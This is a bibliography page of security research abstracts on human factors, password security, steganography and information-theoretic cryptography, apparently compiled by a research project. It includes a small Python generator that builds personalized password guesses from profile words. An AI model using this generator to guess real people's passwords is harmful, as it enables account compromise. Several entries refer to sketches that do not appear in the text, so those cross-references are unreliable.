  • Alain Forget, Saranga Komanduri, Alessandro Acquisti, Nicolas Christin, Lorrie Faith Cranor, Rahul Telang. "Building the Security Behavior Observatory: An Infrastructure for Long-term Monitoring of Client Machines" 2014 HOT SoS, Symposium and Conference on. Raleigh, NC. (To be published in the Journal of the ACM, 2014) (ID#:14-1396) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf We present an architecture for the Security Behavior Observatory (SBO), a client-server infrastructure designed to collect a wide array of data on user and computer behavior from hundreds of participants over several years. The SBO infrastructure had to be carefully designed to fulfill several requirements. First, the SBO must scale with the desired length, breadth, and depth of data collection. Second, we must take extraordinary care to ensure the security of the collected data, which will inevitably include intimate participant behavioral data. Third, the SBO must serve our research interests, which will inevitably change as collected data is analyzed and interpreted. This short paper summarizes some of our design and implementation benefits and discusses a few hurdles and trade-offs to consider when designing such a data collection system.
  • Wei Yang, Xusheng Xiao, Rahul Pandita, William Enck, Tao Xie. "Improving Mobile Application Security via Bridging User Expectations and Application Behaviors" 2014 HOT SoS, Symposium and Conference on. Raleigh, NC. (To be published in the Journal of the ACM, 2014) (ID#:14-1397) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf To keep malware out of mobile application markets, various existing techniques analyze the security aspects of application behaviors and summarize patterns of these security aspects to determine what applications do. However, there is a lack of incorporating user expectations, reflected via user perceptions in combination with user judgment, into the analysis to determine whether the application behaviors are expected by the users. This poster presents our recent work on bridging the semantic gap between user perceptions of the application behavior and the actual application behavior. Keywords: Mobile Application, Privacy Control, Information Flow Analysis, Natural Language Processing
  • Agnes Davis, Ashwin Shashidharan, Qian Liu, William Enck, Anne McLaughlin, Benjamin Watson. "Insecure Behaviors on Mobile Devices under Stress" 2014 HOT SoS, Symposium and Conference on. Raleigh, NC. (To be published in the Journal of the ACM, 2014) (ID#:14-1398) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf One of the biggest challenges in mobile security is human behavior. The most secure password may be useless if it is sent as a text or in an email. The most secure network is only as secure as its most careless user. Thus, in the current project we sought to discover the conditions under which users of mobile devices were most likely to make security errors. This scaffolds a larger project where we will develop automatic ways of detecting such environments and eventually supporting users during these times to encourage safe mobile behaviors.
  • Bakdash, J.Z.; Pizzocaro, D.; Preece, A., "Human Factors in Intelligence, Surveillance, and Reconnaissance: Gaps for Soldiers and Technology Recommendations," Military Communications Conference, MILCOM 2013 - 2013 IEEE , vol., no., pp.1900,1905, 18-20 Nov. 2013. (ID#:14-1399) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6735902&isnumber=6735577 We investigate the gaps for Soldiers in information collection and resource management for Intelligence, Surveillance, and Reconnaissance (ISR). ISR comprises the intelligence functions supporting military operations; we concentrate on ISR for physical sensors (air and ground platforms). To identify gaps, we use approaches from Human Factors (interactions between humans and technical systems to optimize human and system performance) at the level of Soldier functions/activities in ISR. Key gaps (e.g., the loud auditory signatures of some air assets, unofficial ISR requests, and unintended battlefield effects) are identified. These gaps illustrate that ISR is not purely a technical problem. Instead, interactions between technical systems, humans, and the environment result in unpredictability and adaptability in using technical systems. To mitigate these gaps, we provide technology recommendations. Keywords: human factors; surveillance; ISR; battlefield effects; human factors; human-system integration; information collection; intelligence functions; intelligence surveillance reconnaissance; military operations; resource management; soldier functions; technical systems; Artificial intelligence; Human factors; Intelligent sensors; Interviews; Resource management; Security; ISR; cognitive systems engineering; human-systems integration; intelligence; surveillance; reconnaissance
  • Adeka, M.; Shepherd, S.; Abd-Alhameed, R., "Resolving the password security purgatory in the contexts of technology, security and human factors," Computer Applications Technology (ICCAT), 2013 International Conference on , vol., no., pp.1,7, 20-22 Jan. 2013. (ID#:14-1400) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6522044&isnumber=6521952 Passwords are the most popular and constitute the first line of defense in computer-based security systems, despite the existence of more attack-resistant authentication schemes. In order to enhance password security, it is imperative to strike a balance between having enough rules to maintain good security and not having too many rules that would compel users to take evasive actions which would, in turn, compromise security. It is noted that the human factor is the most critical element in the security system for at least three possible reasons: it is the weakest link, the only factor that exercises initiative, and the factor that transcends all the other elements of the entire system. This illustrates the significance of social engineering in security designs, and the fact that security is indeed a function of both technology and human factors, bearing in mind that there can be no technical hacking in a vacuum. This paper examines the current divergence among security engineers as regards the rules governing best practices in the use of passwords: should they be written down or memorized; changed frequently or remain permanent? It also attempts to elucidate the facts surrounding some of the myths associated with computer security. This paper posits that the lack of a requisite balance between the factors of technology and the factors of humanity is responsible for the purgatory posture of password security related problems. It is thus recommended that, in the handling of password security issues, human factors should be given priority over technological factors. The paper proposes the use of the (k, n)-threshold scheme, such as Shamir's secret-sharing scheme, to enhance the security of the password repository. This presupposes an inclination towards writing down the password: after all, Diamond, Platinum, Gold and Silver are not memorized; they are stored. Keywords: authorization; cryptography; social aspects of automation; Shamir secret-sharing scheme; attack-resistant authentication scheme; computer-based security system; human factors context; password repository; password security purgatory; security context; security design; security rule; social engineering; technology context; threshold scheme; computer security; cryptography; human hacking; password; password repository; purgatory; social engineering; socio-cryptanalysis; technology
  • Rajbhandari, L., "Consideration of Opportunity and Human Factor: Required Paradigm Shift for Information Security Risk Management," Intelligence and Security Informatics Conference (EISIC), 2013 European , vol., no., pp.147,150, 12-14 Aug. 2013. . (ID#:14-1401) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6657142&isnumber=6657109 Most of the existing Risk Analysis and Management Methods (RAMMs) focus on threat without taking account of the available opportunity to an entity. Besides, human aspects are not often given much importance in these methods. These issues create a considerable drawback as the available opportunities to an entity (organization, system, etc.) might go unnoticed which might hamper the entity from achieving its objectives. Moreover, understanding the motives of humans plays an important role in guiding the risk analysis. This paper reviews several existing RAMMs to highlight the above issues and provides reasoning as to emphasize the importance of these two issues in information security management. From the analysis of the selected methods, we identified that a majority of the methods acknowledge only threat and the consideration of human factors have not been reflected. Although, the issues are not new, these still remain open and the field of risk management needs to be directed towards addressing them. The review is expected to be helpful both to the researchers and practitioners in providing relevant information to consider these issues for further improving the existing RAMMs or when developing new methods. Keywords: business data processing; human factors; risk management; security of data; RAMM; human aspects; human factor; information security risk management; paradigm shift; risk analysis and management methods; Human factors; Information security; NIST; Risk management; human factors; opportunity; risk management
  • Chowdhury, S.; Poet, R.; Mackenzie, L., "Exploring the Guessability of Image Passwords Using Verbal Descriptions," Trust, Security and Privacy in Computing and Communications (TrustCom), 2013 12th IEEE International Conference on , vol., no., pp.768,775, 16-18 July 2013. . (ID#:14-1402) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6680913&isnumber=6680793 One claimed advantage of the image passwords used in recognition based graphical authentication systems (RBGSs) over text passwords is that they cannot be written down or verbally disclosed. However, there is no empirical evidence to support this claim. In this paper, we present the first published comparison of the vulnerability of four different image types -Mikon, doodle, art and everyday object images to verbal/spoken descriptions, when used as passwords in RBGS. This paper considers one of the human factors in security i.e. password sharing through spoken descriptions. The user study conducted with 126 participants (56 callers/ describer and 70 listeners/ attacker) measures how easy it is for an attacker to guess a password in a RBGS, if the passwords are verbally described. The experimental set up is a two way dialogue between a caller and a listener over telephone using repeated measures protocol, which measures mean successful login percentage. The results of the study show the object images to be most guessable, and doodles follow close behind. Mikon images are less guessable than doodle followed by art images, which are the least guessable. We believe that unless, the human factors in security like the one considered in this paper is taken into account, the RBGSs will always look secure on paper, but fail in practice. Keywords: human factors; image coding; security of data; Mikon image; RBGS; art image; doodle image; everyday object images; human factors; image password guessability; password sharing; recognition based graphical authentication systems; repeated measure protocol; spoken descriptions; text passwords; verbal descriptions; Art; Authentication; Educational institutions; Electronic mail; Image recognition; Protocols; graphical authentication; guessability study; human factors in security; image passwords; password disclosure; verbal descriptions
  • Phuong Cao, Hongyang Li, Klara Nahrstedt, Zbigniew Kalbarczyk, Ravishankar Iyer, Adam J. Slagell. "Personalized Password Guessing: a New Security Threat" 2014 HOT SoS, Symposium and Conference on. Raleigh, NC. (To be published in the Journal of the ACM, 2014). (ID#:14-1403) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf This paper presents a model for generating personalized passwords (i.e., passwords based on user and service profile). A user's password is generated from a list of personalized words, each word drawn from a topic relating to a user and the service in use. The proposed model can be applied to: (i) assess the strength of a password (i.e., determine how many guesses are needed to crack the password), and (ii) generate secure (i.e., containing digits, special characters, or capitalized characters) yet easy-to-memorize passwords. Keywords: guessing, password, personalized, suggestion (An illustrative candidate generator in this spirit appears after this list.)
  • Sambit Bakshi, Tugkan Tuglular. "Security through human-factors and biometrics" Proceedings of the 6th International Conference on Security of Information and Networks November 2013 (Pages 463-463). (ID#:14-1404) Available at: http://dl.acm.org/citation.cfm?id=2523514.2523597&coll=DL&dl=GUIDE&CFID=449173199&CFTOKEN=84629271 or http://doi.acm.org/10.1145/2523514.2523597 Biometrics is the science of identifying or verifying every individual uniquely in a set of people by using physiological or behavioral characteristics possessed by the user. Opposed to the knowledge-based and token-based security systems, cutting-edge biometrics-based identification systems offer higher security and less probability of spoofing. The need of biometric systems is increasing in day-to-day activities due to its ease of use by common people in any sector of personalized access, e.g. in attendance system of organizations, citizenship proof, door lock for high security zones, etc. Financial sector, government, and reservation systems are adopting biometric technologies to ensure highest possible security in their own domains and to maintain signed activity log of every individual. Keywords: human factors, human computer interaction
  • Lisa Rajbhandari. "Consideration of Opportunity and Human Factor: Required Paradigm Shift for Information Security Risk Management" EISIC '13 Proceedings of the 2013 European Intelligence and Security Informatics Conference August 2013 (Pages 147-150) . (ID#:14-1405) Available at: http://dl.acm.org/citation.cfm?id=2547608.2547651&coll=DL&dl=GUIDE&CFID=449173199&CFTOKEN=84629271 or http://dx.doi.org/10.1109/EISIC.2013.32 Most of the existing Risk Analysis and Management Methods (RAMMs) focus on threat without taking account of the available opportunity to an entity. Besides, human aspects are not often given much importance in these methods. These issues create a considerable drawback as the available opportunities to an entity (organization, system, etc.) might go unnoticed which might hamper the entity from achieving its objectives. Moreover, understanding the motives of humans plays an important role in guiding the risk analysis. This paper reviews several existing RAMMs to highlight the above issues and provides reasoning as to emphasize the importance of these two issues in information security management. From the analysis of the selected methods, we identified that a majority of the methods acknowledge only threat and the consideration of human factors have not been reflected. Although, the issues are not new, these still remain open and the field of risk management needs to be directed towards addressing them. The review is expected to be helpful both to the researchers and practitioners in providing relevant information to consider these issues for further improving the existing RAMMs or when developing new methods.
  • Hannah Quay-de la Vallee, James M. Walsh, William Zimrin, Kathi Fisler, Shriram Krishnamurthi, "Usable security as a static-analysis problem: modeling and reasoning about user permissions in social-sharing systems" Proceedings of the 2013 ACM international symposium on New ideas, new paradigms, and reflections on programming & software October 2013 (Pages 1-16) . (ID#:14-1406) Available at: http://dl.acm.org/citation.cfm?id=2509578.2509589&coll=DL&dl=GUIDE&CFID=449173199&CFTOKEN=84629271 or http://doi.acm.org/10.1145/2509578.2509589 The privacy policies of many websites, especially those designed for sharing data, are a product of many inputs. They are defined by the program underlying the website, by user configurations (such as privacy settings), and by the interactions that interfaces enable with the site. A website's security thus depends partly on users' ability to effectively use security mechanisms provided through the interface. Questions about the effectiveness of an interface are typically left to manual evaluation by user-experience experts. However, interfaces are generated by programs and user input is received and processed by programs. This suggests that aspects of usable security could also be approached as a program-analysis problem. This paper establishes a foundation on which to build formal analyses for usable security. We define a formal model for data-sharing websites. We adapt a set of design principles for usable security to modern websites and formalize them with respect to our model. In the formalization, we decompose each principle into two parts: one amenable to formal analysis, and another that requires manual evaluation by a designer. We demonstrate the potential of this approach through a preliminary analysis of models of actual sites. Keywords: formal methods, human factors, protection mechanisms
  • Amir Herzberg, Ronen Margulies. "Forcing Johnny to login safely" Journal of Computer Security - Research in Computer Security and Privacy: Emerging Trends. Volume 21 Issue 3, May 2013 (Pages 393-424). (ID#:14-1407) Available at: http://dl.acm.org/citation.cfm?id=2590618.2590622&coll=DL&dl=GUIDE&CFID=449173199&CFTOKEN=84629271 or http://dl.acm.org/citation.cfm?id=2590618.2590622 We present the results of the first long-term user study of site-based login mechanisms which force and train users to login safely. We found that interactive site-identifying images received 70% detection rates, which is significantly better than the results received by the typical login ceremony and with passive defense indicators [in: CHI'06: Proceedings of the SIGCHI Conference on Human Factors in Computing Systems, ACM, New York, 2006, pp. 601-610; Computers & Security 28(1-2), 2009, 63-71; in: SP'07: Proceedings of the 2007 IEEE Symposium on Security and Privacy, IEEE Computer Society, Washington, 2007, pp. 51-65]. We also found that combining login bookmarks with interactive images and 'non-working' buttons/links achieved the best detection rate (82%) and overall resistance rate (93%). We also present WAPP (Web Application Phishing-Protection), an effective server-side solution which combines the login bookmark and the interactive custom image indicators. WAPP provides two-factor and two-sided authentication.
  • Song Chen, Vandana P. Janeja, "Human perspective to anomaly detection for cybersecurity" Journal of Intelligent Information Systems, Volume 42 Issue 1, February 2014 (Pages 133-153). (ID#:14-1408) Available at: http://dl.acm.org/citation.cfm?id=2583732.2583763&coll=DL&dl=GUIDE&CFID=449173199&CFTOKEN=84629271 or http://dx.doi.org/10.1007/s10844-013-0266-3 Traditionally, signature-based network Intrusion Detection Systems (IDS) rely on inputs from domain experts and can only identify attacks that occur as individual events. IDSs generate a large number of alerts, and it becomes very difficult for human users to go through each message. Previous research has proposed analytics-based approaches to analyze IDS alert patterns based on anomaly detection models, multi-step models, or probabilistic approaches. However, due to the complexities of network intrusions, it is impossible to develop all possible attack patterns or to avoid false positives. With the advance of technologies and the popularity of networks in our daily life, it is becoming more and more difficult to detect network intrusions. However, no matter how rapidly the technologies change, the human behaviors behind the cyber attacks stay relatively constant. This provides us an opportunity to develop an improved system to detect unusual cyber attacks. In this paper, we developed four network intrusion models based on consideration of human factors. We then tested these models on ITOC Cyber Defense Competition (CDX) 2009 data. Our results are encouraging. These models are not only able to recognize most network attacks identified by SNORT log alerts, they are also able to distinguish non-attack network traffic that was potentially missed by SNORT, as indicated by ground-truth validation of the data.
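
The personalized-guessing model of Cao et al. (cited above) can be caricatured in a few lines of code. The generator below combines invented profile words (a pet, a city, an employer) with common mangling rules; the rank at which a target password appears is a rough strength estimate. This is only a sketch of the idea, not the paper's topic-based model.

    from itertools import product

    def personalized_candidates(profile_words, years, suffixes=("", "!", "123")):
        # Combine profile-derived words with simple mangling rules,
        # yielding candidates in a fixed enumeration order.
        for word, year, suf in product(profile_words, years, suffixes):
            for w in (word, word.capitalize()):
                yield f"{w}{year}{suf}"

    profile = ["rex", "chicago", "acme"]          # invented profile topics
    guesses = list(personalized_candidates(profile, ["", "1987", "2014"]))
    print(len(guesses), guesses[:4])

    # Strength assessment: the rank of a password is the number of
    # candidates tried before the guesser finds it.
    target = "Chicago1987!"
    print(guesses.index(target) + 1 if target in guesses else "not found")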

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Information Theoretic Security

Information Theoretic Security


A cryptosystem is said to be information-theoretically secure if its security derives purely from information theory and cannot be broken even when the adversary has unlimited computing power. For example, the one-time pad is an information-theoretically secure cryptosystem, proven secure by Claude Shannon, the inventor of information theory. Information-theoretically secure cryptosystems are often used for the most sensitive communications, such as diplomatic cables and high-level military communications, because of the great efforts enemy governments expend toward breaking them. For the same reason, activity in the methods, theory, and practice of information-theoretic security remains high. The works cited here address quantum computing, steganography, DNA-based security, cyclic elliptic curves, algebraic coding theory, and other approaches.
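
A minimal sketch of the one-time pad mentioned above: XOR the message with a uniformly random key that is exactly as long as the message and never reused. Under those conditions the ciphertext is statistically independent of the plaintext, which is Shannon's perfect secrecy.

    import secrets

    def otp_xor(data: bytes, key: bytes) -> bytes:
        # Encryption and decryption are the same XOR operation.
        assert len(key) == len(data), "key must match message length"
        return bytes(d ^ k for d, k in zip(data, key))

    msg = b"attack at dawn"
    key = secrets.token_bytes(len(msg))   # fresh random key; never reuse
    ct = otp_xor(msg, key)
    assert otp_xor(ct, key) == msg        # XOR with the same key decrypts
    print(ct.hex())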

  • Thapa, D.; Harnesk, D., "Rethinking the Information Security Risk Practices: A Critical Social Theory Perspective," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.3207,3214, 6-9 Jan. 2014. (ID#:14-1684) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6758999&isnumber=6758592 There is a lack of theoretical understanding of information security risk practices. For example, the literature on information security risk is dominated by an instrumental approach to protecting information assets. This approach, however, often fails to acknowledge the ideologies and consequences of risk practices. In this paper, through critical analysis, we suggest various perspectives to advance the understanding in this regard. In doing so, we present our argument by reviewing the security risk literature using Habermas's concept of four orientations: instrumental, strategic, communicative and discursive. The contribution of this paper is to develop conceptual clarity of the risk related ideologies and their consequences on emancipation. Keywords: asset management; risk management; security of data; Habermas concept; communicative orientation; critical analysis; critical social theory perspective; discursive orientation; information asset protection; information security risk practices; instrumental approach; instrumental orientation; risk practices; risk related ideologies; strategic orientation; Context; Information security; Instruments; Organizations; Risk management; Information security risk practices; critical social theory; emancipation
  • Baheti, Ankita; Singh, Lokesh; Khan, Asif Ullah, "Proposed Method for Multimedia Data Security Using Cyclic Elliptic Curve, Chaotic System, and Authentication Using Neural Network," Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on , vol., no., pp.664,668, 7-9 April 2014. (ID#:14-1685) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821481&isnumber=6821334 As multimedia applications are used increasingly, the security of images becomes an important issue. The combination of chaos theory and cryptography forms an important field of information security. In the past decade, chaos-based image encryption has received much attention in information security research, and many image encryption algorithms based on chaotic maps have been proposed. Most of them, however, degrade system performance and security, and suffer from a small key space. This paper introduces an efficient symmetric encryption scheme based on a cyclic elliptic curve and a chaotic system that can overcome these disadvantages. The cipher encrypts 256 bits of plain image to 256 bits of cipher image within eight 32-bit registers. The scheme generates pseudorandom bit sequences for round keys based on a piecewise nonlinear chaotic map; the generated sequences are then mixed with key sequences derived from the cyclic elliptic curve points. The proposed algorithm has a good encryption effect, a large key space, and high sensitivity to small changes in secret keys, and is fast compared to other competitive algorithms. Keywords: Authentication; Chaotic communication; Elliptic curves; Encryption; Media; Multimedia communication; authentication; chaos; decryption; encryption; neural network (A toy chaotic-keystream sketch appears after this list.)
  • Abercrombie, R.K.; Schlicher, B.G.; Sheldon, F.T., "Security Analysis of Selected AMI Failure Scenarios Using Agent Based Game Theoretic Simulation," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.2015,2024, 6-9 Jan. 2014. (ID#:14-1686) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6758853&isnumber=6758592 Information security analysis can be performed using game theory implemented in dynamic Agent Based Game Theoretic (ABGT) simulations. Such simulations can be verified with the results from game theory analysis and further used to explore larger scale, real world scenarios involving multiple attackers, defenders, and information assets. We concentrated our analysis on the Advanced Metering Infrastructure (AMI) functional domain, for which the National Electric Sector Cybersecurity Organization Resource (NESCOR) working group has currently documented 29 failure scenarios. The strategy for the game was developed by analyzing five electric sector representative failure scenarios contained in the AMI functional domain. We characterize these five selected scenarios into three specific threat categories affecting confidentiality, integrity and availability (CIA). The analysis using our ABGT simulation demonstrates how to model the AMI functional domain using a set of rationalized game theoretic rules decomposed from the failure scenarios in terms of how those scenarios might impact the AMI network with respect to CIA. Keywords: game theory; security of data; ABGT simulations; AMI failure scenarios; CIA; NESCOR; advanced metering infrastructure functional domain; agent based game theoretic simulation; confidentiality integrity and availability; information security analysis; national electric sector cyber security organization resource; Analytical models; Availability; Computational modeling; Computer security; Game theory; Games; AMI Failure Scenarios; Advanced Metering Infrastructure; Agent Based Simulation; Availability; Confidentiality; Integrity; Risk Management; Simulation; Smart Grid Cyber Security Analysis
  • Mukherjee, A.; Fakoorian, S.; Huang, J.; Swindlehurst, A., "Principles of Physical Layer Security in Multiuser Wireless Networks: A Survey," Communications Surveys & Tutorials, IEEE, vol.PP, no.99, pp.1,24, February 2014. (ID#:14-1687) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6739367&isnumber=5451756 This paper provides a comprehensive review of the domain of physical layer security in multiuser wireless networks. The essential premise of physical layer security is to enable the exchange of confidential messages over a wireless medium in the presence of unauthorized eavesdroppers, without relying on higher-layer encryption. This can be achieved primarily in two ways: without the need for a secret key by intelligently designing transmit coding strategies, or by exploiting the wireless communication medium to develop secret keys over public channels. The survey begins with an overview of the foundations dating back to the pioneering work of Shannon and Wyner on information-theoretic security. We then describe the evolution of secure transmission strategies from point-to-point channels to multiple-antenna systems, followed by generalizations to multiuser broadcast, multiple-access, interference, and relay networks. Secret-key generation and establishment protocols based on physical layer mechanisms are subsequently covered. Approaches for secrecy based on channel coding design are then examined, along with a description of inter-disciplinary approaches based on game theory and stochastic geometry. The associated problem of physical layer message authentication is also briefly introduced. The survey concludes with observations on potential research directions in this area. Keywords: Information-theoretic security; Physical layer security; artificial noise; cooperative jamming; secrecy; secret-key agreement; wiretap channel
  • Kodovsky, J.; Fridrich, J., "Effect of Image Downsampling on Steganographic Security," Information Forensics and Security, IEEE Transactions on , vol.9, no.5, pp.752,762, May 2014. (ID#:14-1688) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6750732&isnumber=6776454 The accuracy of steganalysis in digital images primarily depends on the statistical properties of neighboring pixels, which are strongly affected by the image acquisition pipeline as well as any processing applied to the image. In this paper, we study how the detectability of embedding changes is affected when the cover image is downsampled prior to embedding. This topic is important for practitioners because the vast majority of images posted on websites, image sharing portals, or attached to e-mails are downsampled. It is also relevant to researchers as the security of steganographic algorithms is commonly evaluated on databases of downsampled images. In the first part of this paper, we investigate empirically how the steganalysis results depend on the parameters of the resizing algorithm: the choice of the interpolation kernel, the scaling factor (resize ratio), antialiasing, and the downsampled pixel grid alignment. We report on several novel phenomena that appear valid universally across the tested cover sources, steganographic methods, and steganalysis features. This paper continues with a theoretical analysis of the simplest interpolation kernel - the box kernel. By fitting a Markov chain model to pixel rows, we analytically compute the Fisher information rate for any mutually independent embedding operation and derive the proper scaling of the secure payload with resizing. For least significant bit (LSB) matching and a limited range of downscaling, the theory fits experiments rather well, which indicates the existence of a new scaling law expressing the length of the secure payload when the cover size is modified by subsampling. Keywords: Markov processes; image matching; sampling methods; steganography; Fisher information rate; LSB matching; Markov chain model; Web sites; antialiasing; cover image; digital images; downsampled pixel grid alignment; e-mail attachment; electronic mail; embedding changes; image acquisition pipeline; image downsampling; image processing; image sharing portals; interpolation kernel; least significant bit matching; mutually independent embedding operation; resize ratio; scaling factor; statistical properties; steganalysis; steganographic algorithms; steganographic security; subsampling; Databases; Electronic mail; Interpolation; Kernel; Payloads; Security; Testing; Steganographic security; image downsampling; steganalysis
  • Stanisavljevic, Z.; Stanisavljevic, J.; Vuletic, P.; Jovanovic, Z., "COALA - System for Visual Representation of Cryptography Algorithms," Learning Technologies, IEEE Transactions on, vol.PP, no.99, pp.1,1, April 2014. (ID#:14-1689) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6784486&isnumber=4620077 Educational software systems have an increasingly significant presence in engineering sciences. They aim to improve students' attitudes and knowledge acquisition typically through visual representation and simulation of complex algorithms and mechanisms or hardware systems that are often not available to the educational institutions. This paper presents a novel software system for CryptOgraphic ALgorithm visuAl representation (COALA), which was developed to support a Data Security course at the School of Electrical Engineering, University of Belgrade. The system allows users to follow the execution of several complex algorithms (DES, AES, RSA, and Diffie-Hellman) on real world examples in a step by step detailed view with the possibility of forward and backward navigation. Benefits of the COALA system for students are observed through the increase of the percentage of students who passed the exam and the average grade on the exams during one school year. Keywords: Algorithm design and analysis; Cryptography; Data visualization; Software algorithms; Visualization
  • Threepak, T.; Watcharapupong, A., "Web attack detection using entropy-based analysis," Information Networking (ICOIN), 2014 International Conference on , vol., no., pp.244,247, 10-12 Feb. 2014. (ID#:14-1690) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6799699&isnumber=6799467 Web attacks are increasing in both magnitude and complexity. In this paper, we use Shannon entropy analysis to detect these attacks. Our approach examines web access log text using the principle that web attack scripts usually have more sophisticated request patterns than legitimate ones. The risk level of attack incidents is indicated by the average (AVG) and standard deviation (SD) of each entropy period, i.e., the Alpha and Beta lines, which are equal to AVG-SD and AVG-2*SD, respectively. They represent boundaries in the detection scheme. As a result, our technique is not only a highly accurate procedure for investigating anomalous web request behavior, but is also useful for pruning huge application access log files to focus on potentially intrusive events. Experiments show that the proposed process can detect anomalous requests in web application systems with proper effectiveness and a low false alarm rate. (A minimal sketch of this entropy-thresholding idea appears after this list.) Keywords: entropy; security of data; AVG-SD; Shannon entropy analysis; Web access logging text; Web attack detection; Web attacking scripts; Web request anomaly behaviors; entropy-based analysis; intrusive events; standard deviation; Complexity theory; Entropy; Equations; Intrusion detection; Mathematical model; Standards; Anomaly Detection; Entropy Analysis; Information Security
  • Jiantao Zhou; Xianming Liu; Au, O.C.; Yuan Yan Tang, "Designing an Efficient Image Encryption-Then-Compression System via Prediction Error Clustering and Random Permutation," Information Forensics and Security, IEEE Transactions on , vol.9, no.1, pp.39,50, Jan. 2014. (ID#:14-1691) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6670767&isnumber=6684617 In many practical scenarios, image encryption has to be conducted prior to image compression. This has led to the problem of how to design a pair of image encryption and compression algorithms such that compressing the encrypted images can still be efficiently performed. In this paper, we design a highly efficient image encryption-then-compression (ETC) system, where both lossless and lossy compression are considered. The proposed image encryption scheme operated in the prediction error domain is shown to be able to provide a reasonably high level of security. We also demonstrate that an arithmetic coding-based approach can be exploited to efficiently compress the encrypted images. More notably, the proposed compression approach applied to encrypted images is only slightly worse, in terms of compression efficiency, than the state-of-the-art lossless/lossy image coders, which take original, unencrypted images as inputs. In contrast, most of the existing ETC solutions induce significant penalty on the compression efficiency. Keywords: arithmetic codes; data compression; image coding; pattern clustering; prediction theory; random codes; ETC; arithmetic coding-based approach; image encryption-then-compression system design; lossless compression; lossless image coder; lossy compression; lossy image coder; prediction error clustering; random permutation; security; Bit rate; Decoding; Encryption; Image coding; Image reconstruction; Compression of encrypted image; encrypted domain signal processing
  • Portmann, C., "Key Recycling in Authentication," Information Theory, IEEE Transactions on , vol.60, no.7, pp.4383,4396, July 2014. (ID#:14-1692) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6797875&isnumber=6832684 In their seminal work on authentication, Wegman and Carter propose that to authenticate multiple messages, it is sufficient to reuse the same hash function as long as each tag is encrypted with a one-time pad. They argue that because the one-time pad is perfectly hiding, the hash function used remains completely unknown to the adversary. Since their proof is not composable, we revisit it using a composable security framework. It turns out that the above argument is insufficient: if the adversary learns whether a corrupted message was accepted or rejected, information about the hash function is leaked, and after a bounded number of rounds it is completely known. We show however that this leak is very small: Wegman and Carter's protocol is still ε-secure if ε-almost strongly universal₂ hash functions are used. This implies that the secret key corresponding to the choice of hash function can be reused in the next round of authentication with no additional error beyond this ε. We also show that if the players have a mild form of synchronization, namely that the receiver knows when a message should be received, the key can be recycled for any arbitrary task, not only new rounds of authentication. (A minimal sketch of the Wegman-Carter construction appears after this list.) Keywords: Abstracts; Authentication; Computational modeling; Cryptography; Protocols; Recycling; Cryptography; authentication; composable security; information-theoretic security
  • Jain, S.; Bhatnagar, V., "Analogy of various DNA based security algorithms using cryptography and steganography," Issues and Challenges in Intelligent Computing Techniques (ICICT), 2014 International Conference on , vol., no., pp.285,291, 7-8 Feb. 2014. (ID#:14-1693) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6781294&isnumber=6781240 In today's era, information technology is growing day by day, and with it the rate of information storage and transmission. Information security is therefore becoming more important: everyone wants to protect their information from attackers and hackers. To provide security to information there are various algorithms of traditional cryptography and steganography. The new field of DNA cryptography has emerged to provide security to data stored in DNA, using the bio-molecular computational abilities of DNA. In this paper the authors compare the various DNA cryptographic algorithms on certain key and important parameters. These parameters would also help future researchers to design or improve DNA storage techniques for secure data storage in a more efficient and reliable manner. The authors also explain the different biological and arithmetic operators used in the DNA cryptographic algorithms. Keywords: DNA; cryptography; information storage; steganography; DNA based security algorithms; DNA cryptography; DNA storage techniques; arithmetic operators; biological operators; biomolecular computational abilities; information security; information storage; information technology; information transformation; steganography; Biological information theory; DNA; Encryption; Facsimile; Arithmetic; Biological; Cryptography; DNA; Steganography
  • Arya, A.; Kumar, S., "Information theoretic feature extraction to reduce dimensionality of Genetic Network Programming based intrusion detection model," Issues and Challenges in Intelligent Computing Techniques (ICICT), 2014 International Conference on , vol., no., pp.34,37, 7-8 Feb. 2014. (ID#:14-1694) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6781248&isnumber=6781240 Intrusion detection techniques require examining a high volume of audit records, so it is always challenging to extract a minimal set of features that reduces the dimensionality of the problem while maintaining efficient performance. Previous researchers analyzed the Genetic Network Programming framework using all 41 features of the KDD Cup 99 dataset and found efficiency of more than 90% at the cost of high dimensionality. We propose a new technique for the same framework with low dimensionality, using an information theoretic approach to select a minimal set of features, resulting in six attributes and giving accuracy very close to their result. Feature selection is based on the hypothesis that all features are not at the same relevance level with respect to a specific class. Simulation results with the KDD Cup 99 dataset indicate that our solution gives accurate results while minimizing additional overhead. Keywords: feature extraction; feature selection; genetic algorithms; information theory; security of data; KDD cup 99 dataset; audit records; dimensionality reduction; feature selection; genetic network programming based intrusion detection model; information theoretic feature extraction; Artificial intelligence; Correlation; Association rule; Discretization; Feature Selection; GNP
